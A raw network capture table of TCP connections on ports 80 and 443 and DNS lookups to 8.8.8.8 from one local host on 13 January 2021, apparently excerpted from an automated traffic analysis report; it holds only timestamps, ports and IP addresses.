Jan 13, 2021 18:15:08.632544041 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632572889 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632582903 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632596016 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632622004 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632662058 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632709980 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632692099 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632754087 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632766008 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632774115 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632777929 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632781982 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632791996 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632831097 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632838011 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632869005 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632874966 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632889032 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632906914 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632925034 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.632945061 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.632957935 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633003950 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633021116 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633040905 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633059978 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633080006 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633095026 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633117914 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633131981 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633167028 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633169889 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633210897 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633225918 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633249044 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633268118 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633289099 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633297920 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633327007 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633341074 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633363962 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633383036 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633416891 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633435011 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633475065 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633490086 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633511066 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633529902 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633559942 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.633563042 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.633616924 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.634031057 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.658196926 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.661461115 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.663748980 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.663840055 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.663881063 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.663919926 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.663940907 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.663969994 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.663984060 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.663990021 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664009094 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664014101 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664052963 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664072037 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664092064 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664093018 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664122105 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664132118 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664136887 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664169073 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664189100 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664208889 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664243937 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664246082 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664278030 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664294004 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664335966 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664335966 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664355040 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664374113 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664386988 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664412022 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664427996 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664450884 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664467096 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664486885 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664505959 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664526939 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664545059 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664563894 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664582968 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664613008 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664617062 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664655924 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664665937 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664694071 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664707899 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664732933 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664748907 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664772987 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664796114 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664810896 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664830923 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664850950 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664865017 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664890051 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664904118 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664937973 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664942026 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.664980888 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.664999962 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665019989 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665035009 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665057898 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665081024 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665096045 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665112972 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665133953 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665152073 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665175915 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665220022 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665220976 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665256023 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665268898 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665302992 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665311098 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:08.665316105 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.665366888 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:08.672210932 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.674324036 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.674565077 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.690767050 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.690856934 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.690865993 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.690913916 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691200972 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691283941 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691627979 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691669941 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691700935 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691709995 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691735983 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691768885 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691792011 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691850901 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691920996 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691961050 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.691996098 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.691998959 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.692015886 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.692038059 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.692054987 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.692162037 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.692164898 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.692204952 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.692224026 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.692260027 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.692284107 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.714797020 CET	443	49735	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.714850903 CET	443	49735	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.714941978 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.714962959 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.717781067 CET	443	49735	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.717854023 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.728940964 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.729182005 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.729223967 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.729294062 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.736397028 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.736485958 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.736592054 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.737375021 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.737473011 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.737478018 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.737521887 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.737541914 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.737548113 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.737577915 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.737601995 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.738707066 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.738748074 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.738785982 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.738792896 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.738811970 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.738812923 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:08.738840103 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.738877058 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.744673967 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.744793892 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:15:08.747519970 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.747562885 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.747600079 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.747637033 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.747644901 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.747678995 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.747684956 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.747689962 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.749496937 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.749547005 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.749596119 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.749628067 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.752810001 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.752850056 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.752923965 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.756293058 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.756335020 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.756361008 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.756400108 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.756407022 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.759741068 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.759793997 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.759850025 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.759877920 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.763104916 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.763144970 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.763221979 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.764735937 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.766458035 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.766499996 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.766551971 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.766582012 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.770015955 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.770055056 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.770116091 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.770665884 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.773437023 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.773549080 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:15:08.841778040 CET	443	49735	145.239.131.51	192.168.2.3
Jan 13, 2021 18:15:08.841972113 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:15:13.602647066 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:13.602684021 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:13.602700949 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:13.602747917 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:13.602798939 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:13.605000019 CET	49726	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:15:13.670723915 CET	443	49726	91.207.103.145	192.168.2.3
Jan 13, 2021 18:15:46.262768030 CET	80	49722	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:46.262878895 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:15:46.365228891 CET	80	49721	5.189.183.184	192.168.2.3
Jan 13, 2021 18:15:46.365307093 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:07.833808899 CET	80	49731	51.91.224.95	192.168.2.3
Jan 13, 2021 18:16:07.833950996 CET	49731	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:16:22.835150003 CET	80	49732	51.91.224.95	192.168.2.3
Jan 13, 2021 18:16:22.835340977 CET	49732	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:16:55.522403002 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:16:55.522548914 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:16:55.522711992 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:16:55.522861004 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:16:55.523427963 CET	49733	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:16:55.523830891 CET	49734	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:16:55.524358034 CET	49732	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:16:55.524866104 CET	49731	80	192.168.2.3	51.91.224.95
Jan 13, 2021 18:16:55.524985075 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:16:55.525722027 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:16:55.525857925 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:16:55.526046038 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:16:55.526838064 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:55.526938915 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:55.563245058 CET	443	49729	104.16.19.94	192.168.2.3
Jan 13, 2021 18:16:55.563517094 CET	49729	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:16:55.563607931 CET	80	49733	216.239.38.21	192.168.2.3
Jan 13, 2021 18:16:55.564114094 CET	80	49734	216.239.38.21	192.168.2.3
Jan 13, 2021 18:16:55.564204931 CET	49734	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:16:55.564248085 CET	49733	80	192.168.2.3	216.239.38.21
Jan 13, 2021 18:16:55.564917088 CET	443	49730	104.16.19.94	192.168.2.3
Jan 13, 2021 18:16:55.566015959 CET	443	49724	104.20.138.65	192.168.2.3
Jan 13, 2021 18:16:55.566107988 CET	49724	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:16:55.566152096 CET	49730	443	192.168.2.3	104.16.19.94
Jan 13, 2021 18:16:55.566195011 CET	443	49723	104.20.138.65	192.168.2.3
Jan 13, 2021 18:16:55.571926117 CET	49723	443	192.168.2.3	104.20.138.65
Jan 13, 2021 18:16:55.580916882 CET	80	49732	51.91.224.95	192.168.2.3
Jan 13, 2021 18:16:55.581131935 CET	80	49731	51.91.224.95	192.168.2.3
Jan 13, 2021 18:16:55.581202984 CET	443	49737	51.91.224.95	192.168.2.3
Jan 13, 2021 18:16:55.583698034 CET	49737	443	192.168.2.3	51.91.224.95
Jan 13, 2021 18:16:55.588040113 CET	443	49735	145.239.131.51	192.168.2.3
Jan 13, 2021 18:16:55.591754913 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:16:55.591794968 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:16:55.591810942 CET	443	49725	91.207.103.145	192.168.2.3
Jan 13, 2021 18:16:55.591984034 CET	49735	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:16:55.592052937 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:16:55.592086077 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:16:55.595818043 CET	49725	443	192.168.2.3	91.207.103.145
Jan 13, 2021 18:16:55.602947950 CET	443	49736	145.239.131.51	192.168.2.3
Jan 13, 2021 18:16:55.603132963 CET	49736	443	192.168.2.3	145.239.131.51
Jan 13, 2021 18:16:55.832187891 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:55.834925890 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:56.441662073 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:56.441679001 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:57.646404028 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:16:57.646447897 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:17:00.051485062 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:17:00.051512003 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:17:04.864425898 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:17:04.864517927 CET	49722	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:17:14.474386930 CET	49721	80	192.168.2.3	5.189.183.184
Jan 13, 2021 18:17:14.474421024 CET	49722	80	192.168.2.3	5.189.183.184

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 18:14:58.753758907 CET	53	58361	8.8.8.8	192.168.2.3
Jan 13, 2021 18:14:59.691842079 CET	63492	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:14:59.742758989 CET	53	63492	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:01.168567896 CET	60831	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:01.219615936 CET	53	60831	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:02.498325109 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:03.510668039 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:03.561605930 CET	53	60100	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:04.816637039 CET	53195	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:04.875025034 CET	53	53195	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:05.088589907 CET	50141	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:05.139514923 CET	53	50141	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:06.112787962 CET	53023	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:06.185707092 CET	53	53023	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:06.318650007 CET	49563	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:06.374808073 CET	53	49563	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:07.120925903 CET	51352	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:07.215490103 CET	53	51352	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:07.569763899 CET	59349	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:07.572455883 CET	57084	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:07.599348068 CET	58823	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:07.613245010 CET	57568	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:07.617811918 CET	53	59349	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:07.632033110 CET	50540	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:07.661410093 CET	53	57568	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:07.718322039 CET	53	57084	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:07.745613098 CET	53	58823	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:07.782058954 CET	53	50540	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:08.676229954 CET	54366	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:08.724147081 CET	53	54366	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:22.511854887 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:22.541568041 CET	57762	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:22.568409920 CET	53	53034	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:22.589494944 CET	53	57762	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:23.754059076 CET	55435	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:23.810782909 CET	53	55435	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:24.689307928 CET	50713	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:24.739923000 CET	53	50713	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:25.628058910 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:25.687186956 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:26.723901033 CET	58987	53	192.168.2.3	8.8.8.8
